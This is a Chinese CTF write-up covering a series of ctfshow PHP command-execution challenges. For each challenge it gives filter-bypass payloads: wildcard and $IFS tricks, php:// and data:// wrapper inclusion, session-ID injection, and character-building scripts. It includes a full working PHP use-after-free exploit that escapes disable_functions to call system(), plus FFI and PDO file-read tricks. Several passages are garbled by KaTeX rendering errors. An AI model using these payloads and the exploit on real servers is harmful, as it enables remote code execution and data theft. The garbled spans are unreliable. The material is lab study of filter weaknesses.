命令执行
第二十九题
提示信息:命令执行,需要严格的过滤
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
查看源码,传入c参数。
?c=echo `tac fl''ag.php`;
获得flag
至于为什么可以用fl’‘ag.php代替flag.php,暂时理解为是linux特性,这里在payload中不能在php中间加’’,即不能这样flag.ph’'p。
第三十题
提示信息:命令执行,需要严格的过滤
过滤增加了system,php
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
?代表任意一个字符,利用ph?代替php,payload为
?c=echo `tac fla''g.ph?`;
第三十一题
提示信息:命令执行,需要严格的过滤
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
经过测试,每当用fl?g?p?p等代替flag.php的时候会生成一个fl?g?p?p(同名的)文件,里面是乱码,这样就无法进行替换。
方法一:
payload:
show_source(next(array_reverse(scandir(pos(localeconv())))));
show_source()高亮显示源码
next()输出当前数组值的下一个值
array_reverse()逆序输出数组
scandir()列出文件夹目录
pos()当前数组值
localeconv()貌似第一个元素为.
测试:
测试如下代码:
结果:
测试如下代码:
结果:
测试如下代码:
结果:
测试如下代码:
结果:
测试如下代码:
结果:
测试如下代码:
结果:
在目录只有flag.php index.php时用此payload获得flag
方法二:
可以用%09(只有在php环境下才能表示空格)表示空格
payload:
?c=echo%09`tac%09fla*`;
执行payload获得flag
第三十二题
信息提示:命令执行,需要严格的过滤
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}
当我们传入?c=KaTeX parse error: Expected 'EOF', got '&' at position 12: _GET['url']&̲url=phpinfo()时,…_GET[‘c’]的值为$_GET[‘url’](参数url的值在此没有赋值给参数c)。但是当我们传
?c=include$_GET['url']?>&url=php://filter/read=convert.base64- encode/resource=flag.php
php伪协议会执行。
这里的payload为什么要加?>呢?这是eval函数的原因。
测试如下代码:
url:
结果:
结论:我们传入的参数url的值不会赋值给参数c。参数c的值为$_GET[“url”]。那么同时我们的phpinfo()也不会执行。
建立同目录下的文件info.php
url:
结果:
这应该是include函数的效果吧。
payload:
c=include$_GET["url"]?>&url=php://filter/read=convert.base64- encode/resource=flag.php
获得flag.php的base64编码值。解密获得flag
第三十三题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}
同样的payload(参数换成数字,因为匹配单引号和双引号):
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
解码获得flag
也可以
c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
测试如下代码:
url:
结果:
测试:
第三十四题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}
相同的payload:
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
结果进行解码可得flag
第三十五题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}
payload:
?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
解码获得flag
第三十六题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}
paylaod:
?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
这里参数a不要引号括起来也可以。
解码获得flag
测试如下代码:
url:
结果:
第三十七题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}
data伪协议数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。
用法:
data://text/palin,<?php phpinfo();?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
data:text/palin,<?php phpinfo();?>
data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
payload:
查看源码获得flag
第三十八题待做
提示信息:命令执行,需要严格的过滤
过滤代码:
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}
payload:
查看源码获得flag
也可以不要base64编码,但是这时候要用php段标签绕过php
包含日志文件获取shell
尝试写一句话木马进日志文件
包含日志文件查看里面的内容
可以看到写入的一句话木马经过了url编码,导致无法正常解析,这是浏览器的缘故,可以用burp(curl)写入一句话,
手动把参数c的一句话木马改成没有经url编码的样式
这里没成功,不知道为何
第三十九题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}
poc为:
?c=data://text/plain,<?php phpinfo();?>
结果:
说明后面的.php对php语句的执行没有影响,后面的.php当作html输出了。
payload:
查看源码获得flag
第四十题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}
可以用前面的payload:
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
用session。
payload:
?c=session_start();system(session_id());
捉包改phpsessionid为ls,成功执行
执行cat flag.php,无法成功执行,这是因为phpsessionid中在php版本为5.5以下及7.1以上时,限制只能是0-9 a-z A-Z - 在版本为5.5-7.19是可以执行的。
第四十一题
提示信息:过滤不严,命令执行
过滤代码:
if(isset($_POST['c'])){
$c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
eval("echo($c);");
}
}
利用别人的脚本:
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/10 12:56
# blog: www.wlhhlc.top
import requests
import urllib
import re
from sys import *
if(len(argv)!=2):
print("="*50)
print('USER:python exp.py <url>')
print("eg: python exp.py http://ctf.show/")
print("exit: input exit in function")
print("="*50)
exit(0)
url=argv[1]
#生成可用的字符
def write_rce():
result = ''
preg = '[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-'
for i in range(256):
for j in range(256):
if not (re.match(preg, chr(i), re.I) or re.match(preg, chr(j), re.I)):
k = i | j
if k >= 32 and k <= 126:
a = '%' + hex(i)[2:].zfill(2)
b = '%' + hex(j)[2:].zfill(2)
result += (chr(k) + ' ' + a + ' ' + b + '\n')
f = open('rce.txt', 'w')
f.write(result)
#根据输入的命令在生成的txt中进行匹配
def action(arg):
s1=""
s2=""
for i in arg:
f=open("rce.txt","r")
while True:
t=f.readline()
if t=="":
break
if t[0]==i:
s1+=t[2:5]
s2+=t[6:9]
break
f.close()
output="(\""+s1+"\"|\""+s2+"\")"
return(output)
def main():
write_rce()
while True:
s1 = input("\n[+] your function:")
if s1 == "exit":
break
s2 = input("[+] your command:")
param=action(s1) + action(s2)
data={
'c':urllib.parse.unquote(param)
}
r=requests.post(url,data=data)
print("\n[*] result:\n"+r.text)
main()
执行脚本获得flag
第四十二题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}
分号(;)在linux下把命令分隔开来,从左至右依次执行,不关心是否失败,所有命令都会执行。
执行?c=cat flag.php;,查看源代码获得flag
第四十三题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}
com1||com2 从左到右开始执行,只要有一个执行成功,那么就不会执行后面的命令。
payload:
查看源代码获得flag
第四十四题
提示信息:命令执行,需要严格的过滤
过滤代码:
f(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
}
}
payload:
写入payload获得flag
可以用%0a作命令分隔符(注意url编码,这里先存个疑)
第四十五题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}
payload:
执行命令获得flag
可以用$IFS代替空格
payload:
tac$IFS*%0A(注意url编码,这里存个疑)
第四十六题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
}
}
payload:
执行命令获得flag
第四十七题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
system($c." >/dev/null 2>&1");
}
}
payload:
执行命令获得flag
第四十八题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
system($c." >/dev/null 2>&1");
}
}
payload:
执行命令获得flag
第四十九题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
system($c." >/dev/null 2>&1");
}
}
payload:
执行命令获得flag
第五十题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}
payload:
执行命令获得flag
第五十一题
提示信息:命令执行,需要严格的过滤
这次还过滤了tac,但vi没有过滤
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
system($c." >/dev/null 2>&1");
}
}
payload:
执行payload获得flag
第五十二题
提示信息:命令执行,需要严格的过滤
这次还过滤了<>
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c." >/dev/null 2>&1");
}
}
可以用${IFS}代替空格
payload:
flag.php没有内容
查看根目录文件,根目录有flag文件,文件才可以用nl 查看
查看flag文件里面的内容
第五十三题
提示信息:命令执行,需要严格的过滤
代码:
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
echo($c);
$d = system($c);
echo "<br>".$d;
}
payload:
or
执行payload获得flag
第五十四题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}
可以用paste查看文件内容
payload:
可以用通匹符表示命令,但是通匹符不会帮你找/bin/下面的cat,而会找当前目录下匹配?at的文件,所以用通匹符代表命令的时候要给出路径
payload:
执行payload,查看源码获得flag
也可以用grep命令进行查看
grep show flag.php打印flag.php中有show的一行
第五十五题
提示信息:命令执行,需要严格的过滤
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}
方法一:
过滤了所有字母,这时候需要构造无字母payload
可以用/???/???64 ???表示/bin/base64 flag.php这是因为linux命令可以用通匹符来代替,且这个命令有64可以与其它命令进行区分
但是本地测试时不成功,不了解是啥原因
执行payload获得flag的base64编码
解码获得flag
方法二:
POST一个文件上去,在linux下默认保存在/tmp/phpxxxxxx下,并且最后一个字母可能为大写字母。字母被过滤了,我们利用通匹符匹配大写字母。查看ascii码表
可以看到在大写字母之间的是@和[,所以我们可以用[@-[]表示大写字母。
执行命令用(source).执行,且.执行不需要执行权限。(source通常用.表示)
测试:
注意的是:貌似.和source执行的时候需要绝对路径,否则无法正确执行
那么我们的payload为
. /???/????????[@-[]
可以构造POST数据包在burp里执行payload(但是试了下不成功)
利用python脚本
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/11 9:14
# blog: www.wlhhlc.top
import requests
while True:
url = "http://92a3d8ba-280b-4cb8-bd47-58b577bb6204.chall.ctf.show:8080/?c=. /???/????????[@-[]"
r = requests.post(url, files={"file": ("dota.txt", "cat flag.php")})
flag = r.text.split('ctfshow')
if len(flag) >1:
print(r.text)
break
执行脚本获得flag
参考:https://www.wlhhlc.top/posts/14827/#web56
https://blog.csdn.net/violet_echo_0908/article/details/52056071
第五十六题
提示信息:命令执行,需要严格的过滤
还过滤了数字,所以方法一不能使用了,但是还可以使用方法二
过滤代码:
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}
执行payload获得flag
第五十七题
提示信息:命令执行,需要严格的过滤,已测试,可绕
过滤代码:
//flag in 36.php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
system("cat ".$c.".php");
}
}
只要构造出36即可
${_}表示上一次输出的结果,没有过命令输出时为0
$(())做加法运算
里面为空时值为0
( ( ((~ (( (())))对0取反为-1
不能~$(()),测试这个输出的是当前目录
所以 ( ( (( (((($(())))$(($(())))))为-2
那么构造出-37再取反即得36(对x取反,结果为-(x+1))
python构造payload
payload = "$((~$(("+"$((~$(())))"*37+"))))"
print(payload)
payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
执行payload,查看源码获得flag
第五十八-六十五题
提示信息:命令执行,突破禁用函数
过滤代码:
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}
试了一圈,执行命令的函数都被禁用了
那么用show_source(高亮语法显示文件内容)函数
payload(POST方式):
?c=show_source('flag.php');
执行payload获得flag
58-65题是相同的题
第六十六题
提示信息:命令执行,突破禁用函数,求你们别秀了
过滤代码:
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}
show_source函数被禁用了
但是highlight_file函数没有被禁用,highlight_file函数对文件进行语法高亮显示。
scandir函数返回指定目录中的文件和目录的数组。用此函数查看根目录/下文件和目录的情况
用highlight_file函数对flag.txt进行语法高亮显示,获得flag。
第六十七题
提示信息:命令执行,突破禁用函数,求你们别秀了
过滤代码:
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
}
print_r被过滤了
用var_dump可以输出数组的内容
执行payload获得flag
第六十八题
提示信息:命令执行,突破禁用函数,求你们别秀了
这里直接报highlight_file函数不能被使用的警告,导致看不到index.php的过滤代码
尝试包含index.php,文件太大,占用内存过多,无法成功包含
ini_set用来设置php.ini的值,在函数执行的时候生效,脚本结束后,设置失效。无需打开php.ini文件,就能修改配置,对于虚拟空间来说,很方便。
对于配置中的定义解释是: memory_limit = 128M ; Maximum amount of memory a script may consume (128MB) 最大单线程的独立内存使用量。也就是一个web请求,给予线程最大的内存使用量的定义。
ini_set(“display_errors”, 0);关闭错误显示
尝试用ini_set函数临时更改memory_limit选项值,但是此函数也被禁用。
error_reporting函数规定不同的错误级别报告,error_reporting(0)关闭错误报告
但是此函数也被禁用
那么直接用scandir函数显示出根目录下的文件和文件夹的情况吧
include函数会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中。文件内容有代码则执行代码,否则直接输出。
用include包含flag.txt文件,获得flag
第六十九题
提示信息:命令执行,突破禁用函数,求你们别秀了
一开始就报highlight_file函数被禁用的警告,无法查看到过滤代码,且无法包含index.php以显示代码
var_dump和print_r两个打印数组的函数也被禁用了,无法查看到根目录的文件和目录的情况
那么盲猜flag存储在与上题相同的路径下
尝试包含
获得flag
第七十题
提示信息:命令执行,突破禁用函数,求你们别秀了
与上题一样
直接盲猜
第七十一题
提示信息:命令执行,突破禁用函数,求你们别秀了
下载index.php文件,过滤代码存储在里面
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}
ob_get_contents函数获得缓冲区的内容,即在此为代码执行的输出结果
在任何时候使用echo,输出都将被加入缓冲区中,直到程序运行结束或者使用ob_flush()来结束。然后在服务器中缓冲区的内容才会发送到浏览器,由浏览器来解析显示。
ob_end_clean函数清除缓冲区的内容。
此时得用一个函数ob_get_contents()在ob_end_clean()前面来获得缓冲区的内容。
这样的话,能将在执行ob_end_clean()前把内容保存到一个变量中,然后在ob_end_clean()函数执行后对这个变量做操作。
exit() 函数输出一条消息,并退出当前脚本。
那么在执行完代码之后结束脚本的运行就可以了
payload:
include('/flag.txt');exit(0);
执行payload
获得flag
第七十二题
提示信息:命令执行,突破禁用函数,求你们别秀了
下载index.php,过滤代码存储在里面
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}
glob:// — 查找匹配的文件路径模式
遍历根目录文件和文件夹的内容
c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);
?>
尝试include,发现include函数无法包含flag0.txt文件
payload:
c=function ctfshow($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf("%c",($ptr & 0xff));
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf("%c",($v & 0xff));
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) {
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) {
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
write($abc, 0x60, 2);
write($abc, 0x70, 6);
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);
($helper->b)($cmd);
exit();
}
ctfshow("cat /flag0.txt");ob_end_flush();
需要进行url编码(burp捉包进行url编码)
执行payload获得flag
参考:https://www.php.net/manual/zh/wrappers.glob.php
https://www.wlhhlc.top/posts/14827/#web72
第七十三题
提示信息:命令执行,突破禁用函数,求你们别秀了
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}
print_r和var_dump都被禁用
用DirectoryIterator类获得根目录下的文件和文件夹情况
c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);
?>
尝试用include函数包含flagc.txt文件获得flag
c=include('/flagc.txt');exit(0);
第七十四题
提示信息:命令执行,突破禁用函数,求你们别秀了
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}
print_r和var_dump函数被禁用
用DirectoryIterator类获得根目录下的文件和文件夹情况
c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
echo($f->__toString().' ');
}
exit(0);
?>
include函数包含flagx.txt文件获得flag
第七十五题
提示信息:命令执行,突破禁用函数,求你们别秀了
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents();
ob_end_clean();
echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}
print_r和var_dump函数被禁用
用DirectoryIterator类遍历根目录
include无法成功包含flag36.txt
open_basedir是用来限制php的权限的,如果不在允许的范围内,php就不能访问。
利用PDO连接mysql数据库,进行数据库查询flag36.txt文件,获得flag
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);
测试:
flag36.txt文件内容
index.php文件内容
可以看到所有文件内容都在$row[0]里面
PDO使用参考:https://www.runoob.com/php/php-pdo.html
第七十六题
提示信息:命令执行,突破禁用函数,求你们别秀了
print_r和var_dump函数被禁用
用DirectoryIterator类遍历根目录
利用PDO连接mysql数据库,进行数据库查询flag36d.txt文件,获得flag
第七十七题
c语言system函数原型
利用FFI(php版本在7.4以上才有)调用c的system函数,FFI::cdef创建一个对象。
$ffi = FFI::cdef("int system(const char *command);");$a='/readflag > 1.txt'; $ffi->system($a);
这道题执行ls等命令都没有回显
那么直接重定向内容到3.txt上,获得flag
用cat命令重定向的时候,访问文件变成下载并且里面内容显示乱码
FFI使用参考:https://www.php.cn/php-weizijiaocheng-415807.html
第一百一十八题
查看源码提示
system($code);
测试发现没过滤大写字母和$ {} . ?等
那么用linux系统的内置变量进行拼接命令
${PATH}环境变量
P A T H : 0 : 1 从 环 境 变 量 的 下 标 0 开 始 取 一 位 同 {PATH:0:1}从环境变量的下标0开始取一位 同 PATH:0:1从环境变量的下标0开始取一位同{PATH:0}
P A T H : 0 从 环 境 变 量 的 最 后 开 始 取 一 位 同 {PATH:~0}从环境变量的最后开始取一位 同 PATH: 0从环境变量的最后开始取一位同{PATH:~A}
P W D 当 前 路 径 同 {PWD}当前路径 同 PWD当前路径同PWD
那么我们构造nl命令进行查看
${PATH:~A}${PWD:~A} ????.???
代替nl flag.php
执行payload并查看源码获得flag
第一百一十九题
此处还禁用了PATH变量
那么构造/bin/cat命令进行查看文件
/用 P W D : 0 : 1 来 构 造 , 但 是 数 字 被 过 滤 了 , 那 么 用 {PWD:0:1}来构造,但是数字被过滤了,那么用 PWD:0:1来构造,但是数字被过滤了,那么用{#}代替0,${SHLVL}代替1
那么/用KaTeX parse error: Expected '}', got 'EOF' at end of input: {PWD:{#}